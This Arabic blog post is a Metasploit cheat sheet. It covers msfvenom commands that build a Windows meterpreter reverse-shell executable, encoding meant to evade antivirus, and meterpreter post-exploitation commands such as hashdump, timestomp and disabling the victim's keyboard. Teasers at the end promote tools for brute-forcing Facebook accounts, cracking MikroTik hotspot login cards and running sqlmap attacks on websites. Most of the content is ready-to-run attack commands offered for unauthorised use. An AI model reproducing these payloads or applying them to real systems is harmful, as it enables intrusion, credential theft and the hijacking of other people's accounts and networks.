مشروع اختبار الاختراق في Metasploit لي الكمبيوتر والاندرويد

 


مشروع Metasploit هو مشروع أمان كمبيوتر يوفر معلومات عن نقاط الضعف ، ويساعد في تطوير اختبارات الاختراق وتوقيعات نظام كشف التسلل.


Metasploit هي أداة شائعة يستخدمها خبراء pentest. لقد أعددت وثيقة لتتعلمها.


ميتاسبلويت:

البحث عن وحدة:

msf > search [regex]

حدد واستغل لاستخدام:

msf > use exploit/[ExploitPath]

حدد حمولة لاستخدامها:

msf > set PAYLOAD [PayloadPath]

إظهار الخيارات للوحدات النمطية الحالية:

msf > show options

ضبط الخيارات:

msf > set [Option] [Value]

ابدأ الاستغلال:

msf > exploit 

وحدات مساعدة مفيدة

ماسح المنفذ:

msf > use auxiliary/scanner/portscan/tcp

msf > set RHOSTS 10.10.10.0/24

msf > run

تعداد DNS:

msf > use auxiliary/gather/dns_enum

msf > set DOMAIN target.tgt

msf > run

خادم بروتوكول نقل الملفات:

msf > use auxiliary/server/ftp

msf > set FTPROOT /tmp/ftproot

msf > run

مخدم بروكسي:

msf > use auxiliary/server/socks4

msf > run 

msfvenom:

يمكن استخدام أداة msfvenom لإنشاء حمولات Metasploit (مثل Meterpreter) كملفات قائمة بذاتها وترميزها اختياريًا. تحل هذه الأداة محل أدوات msfpayload و msfencode السابقة. قم بتشغيل "-l payloads" للحصول على قائمة الحمولات.


$ msfvenom –p [PayloadPath]

–f [FormatType]

LHOST=[LocalHost (if reverse conn.)]

LPORT=[LocalPort]

مثال :


عكس الحمولة كملف قابل للتنفيذ وإعادة توجيهه إلى ملف:


$ msfvenom -p windows/meterpreter/

reverse_tcp -f exe LHOST=10.1.1.1

LPORT=4444 > met.exe

خيارات التنسيق (المحددة بـ –f) - تنسيقات المساعدة - سرد تنسيقات الإخراج المتاحة


exe - قابل للتنفيذ pl - Perl rb - Ruby raw - كود قشرة خام c - كود C


ترميز الحمولات مع msfvenom


يمكن استخدام أداة msfvenom لتطبيق مستوى من الترميز لتجاوز مكافحة الفيروسات. استخدم "-l encoders" للحصول على قائمة من برامج التشفير.


$ msfvenom -p [Payload] -e [Encoder] -f

[FormatType] -i [EncodeInterations]

LHOST=[LocalHost (if reverse conn.)]

LPORT=[LocalPort]

مثال


قم بترميز حمولة من msfpayload 5 مرات باستخدام تشفير shikata-ga-nai وإخراجها كقابلة للتنفيذ:


$ msfvenom -p windows/meterpreter/

reverse_tcp -i 5 -e x86/shikata_ga_nai -f

exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

أوامر القاعدة:

؟ / help: عرض ملخص للأوامر exit / quit: قم بإنهاء جلسة Meterpreter


sysinfo: إظهار اسم النظام ونوع نظام التشغيل


إيقاف التشغيل / إعادة التشغيل: واضح بذاته


أوامر نظام الملفات:


cd: تغيير الدليل


lcd: قم بتغيير الدليل على الجهاز المحلي (المهاجم)


pwd / getwd: عرض دليل العمل الحالي


ls: إظهار محتويات الدليل


: قم بعرض محتويات الملف على الشاشة


تنزيل / تحميل: انقل الملفات إلى / من الجهاز الهدف


mkdir / rmdir: إنشاء / إزالة الدليل


تحرير: فتح ملف في المحرر الافتراضي (عادة السادس)


أوامر العملية:


getpid: عرض معرّف العملية الذي يعمل Metpreter بداخله.


getuid: عرض معرف المستخدم الذي يعمل به Meterpreter.


ملاحظة: عرض قائمة العمليات.


kill: إنهاء العملية بناءً على معرف العملية الخاص بها.


تنفيذ: قم بتشغيل برنامج معين بامتيازات العملية التي تم تحميل Meterpreter فيها.


الترحيل: انتقل إلى معرّف عملية الوجهة المحدد


يجب أن يكون للعملية المستهدفة نفس الامتيازات أو امتيازات أقل


قد تكون العملية المستهدفة عملية أكثر استقرارًا


عندما تكون داخل عملية ، يمكنك الوصول إلى أي ملفات تم قفلها.


أوامر الشبكة:

ipconfig: إظهار معلومات واجهة الشبكة


portfwd: إعادة توجيه الحزم من خلال جلسة TCP


الطريق: إدارة / عرض جدول توجيه النظام


أوامر متنوعة:

idletime: عرض مدة خمول واجهة المستخدم الرسومية للجهاز المستهدف.


uictl [تمكين / تعطيل] [لوحة المفاتيح / الماوس]: تمكين / تعطيل الماوس أو لوحة المفاتيح للجهاز الهدف.


لقطة الشاشة: احفظ كصورة لقطة شاشة للجهاز المستهدف.


وحدات إضافية:

استخدم [module]: قم بتحميل الوحدة النمطية المحددة


مثال:


use priv: تحميل الوحدة الخاصة


hashdump: تفريغ التجزئة من الصندوق


timestomp: تعديل الطوابع الزمنية لملف NTFS


إدارة الجلسات

الاستغلال المتعدد:

قم بتشغيل الاستغلال متوقعًا جلسة واحدة تكون في الخلفية على الفور:


msf > exploit -z

قم بتشغيل استغلال في الخلفية وتوقع جلسة واحدة أو أكثر يتم إخفاؤها على الفور:


msf > exploit –j

قائمة بجميع الوظائف الحالية (عادة ما تستغل المستمعين):

msf > jobs –l

اقتل وظيفة:

msf > jobs –k [JobID]

جلسات متعددة:

قائمة بجميع الجلسات الخلفية:

msf > sessions -l

التفاعل مع جلسة خلفية:

msf > session -i [SessionID]

خلفية الجلسة التفاعلية الحالية:

meterpreter > <Ctrl+Z>

or

meterpreter > background

التوجيه من خلال الجلسات:

ستتم محاورة جميع الوحدات (عمليات استغلال / post / aux) مقابل قناع الشبكة الفرعية الهدف خلال هذه الجلسة.


msf > route add [Subnet to Route To]

[Subnet Netmask] [SessionID]



تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

اختراق حسابات الفيسبوك عن طريق التخمين

السَلٱمٌ عـَلـْيگمّ-ۈرحـْمّـٌة ٱللـّہ ﯙبُرگـّاتہ الًيَوُمًِ معنا اداة اختراق حسابات الفيسبوك عن طريق التخمين ويمكنك انشاء لسته حسب رغبت كل شخص تثبيت الاداة apt upgrade && apt update pkg install python2 git nano pip2 install requests git clone https://github.com/sadamshr3be/FACEBOOK3 cd FACEBOOK3 #التقاط الصورة * كيف تنشئ قائمة كلمات بنفسك؟ nano wordlist.txt بعد ذلك احفظ باستخدام = CTRL + C >> انقر فوق Y وأدخل انتر يمكنك الآن تشغيل هذه الأدوات باستخدام python2 bruteforce.py قناتي علـّۓ. اليوتيوب https://youtube.com/channel/UCGmfv3D0tcKvHp8Tolf6Yqw قناتي على التلجرام https://t.me/termuxalsharabi المدونه. https://termuxalsharabi.blogspot.com بقلم صدام الشرعبي
قراءة المزيد

كيف تصنع من الشبكات الذي تطلب تسجيل دخول وصنع ملايئن الكروت

 كيفيه اختراق شبكات المايكروتيك ( الكروت ) : الاوامر : $ pkg update -y $ pkg upgrade -y $ pkg install git -y $ pkg install python3-pip -y $ pkg install pip3 -y $ git clone https://github.com/sadamshr3be/SADAM-You-Can $ cd SADAM-You-Can $ pip3 install requests $ pip3 install N4Tools وبعد python3 setup.py install بعد ذالك نقوم بتعديل ملف Make-List.py ننتظر حــْـِْ؟؟ـْْـِتي يخلص بعدها تقوم بانشاء لسته من ملف Make-List.py وتقوم بالتعديل على الكود باول رقم تعتقده بالكروت واخر رقم مثال 400000000 واخر رقم 499999999 بعدها قم بنقل اللسته داخل الملف وقم بتشغيلها عبر الامر python3 N404-Tool.py سيطلب منك رابط الصفحه قم بعمل رابط الصفحه مثال : http://m.com
قراءة المزيد

أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL

 أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL لغة الاستعلامات الهيكلية ، والتي تُعرف باسم SQL ، هي لغة البرمجة الشائعة التي تسطرها معظم أنظمة إدارة قواعد البيانات. يوفر طريقة شائعة للتطبيق للوصول إلى البيانات الموجودة في قاعدة البيانات باستخدام مجموعة مشتركة من الأوامر التي يمكن لقاعدة البيانات فهمها. يستغل المهاجمون قواعد البيانات هذه بجعلهم يخرجون معلومات لا ينبغي لهم عرضها. أحيانًا يكون هذا بسيطًا مثل المهاجم الذي يطلب معلومات مميزة من نظام إدارة قاعدة البيانات . في أحيان أخرى ، يستفيد من التكوينات الضعيفة من قبل مسؤولي قواعد البيانات. من الاستطلاع إلى تغطية المسارات - 5 مراحل للقرصنة الأخلاقية من الألف إلى الياء - مؤشر ثغرات الويب - معيار OWASP من الألف إلى الياء - مجموعة أدوات الأمن السيبراني قد يستفيد المهاجمون أيضًا من ثغرة أمنية في نظام إدارة قاعدة البيانات تسمح للمهاجم بعرض أو كتابة أوامر مميزة من قاعدة البيانات وإليها. تقوم Sqlmap بأتمتة عملية اكتشاف واستغلال الثغرات الأمنية لحقن SQL والاستيلاء على خوادم قواعد البيانات. يأتي Sqlmap مزودًا بمحرك كشف ، بالإضافة ...
قراءة المزيد